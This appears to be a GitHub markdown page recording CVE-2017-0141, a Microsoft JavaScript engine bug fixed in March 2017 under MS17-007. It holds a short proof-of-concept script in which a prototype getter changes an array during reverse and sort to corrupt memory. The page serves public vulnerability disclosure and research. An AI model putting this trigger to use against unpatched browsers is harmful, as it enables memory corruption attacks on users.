CVE-2017-0141

Fix: Mar 2017
Credit: Semmle Inc

PoC

PoC from tunz

let arr = [];
arr[1000] = 321321;
let proto = {};
Object.defineProperty(proto, "0", {get: function() {
    arr[2000] = 0x41414141;
    return 123;
}});

arr.__proto__ = proto;
Array.prototype.reverse.call(arr);
Array.prototype.sort.call(arr);

Reference

Microsoft (MS17-007)
Fix

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2017-0141.md

CVE-2017-0141.md

CVE-2017-0141

PoC

Reference

Files

CVE-2017-0141.md

Latest commit

History

CVE-2017-0141.md

File metadata and controls

CVE-2017-0141

PoC

Reference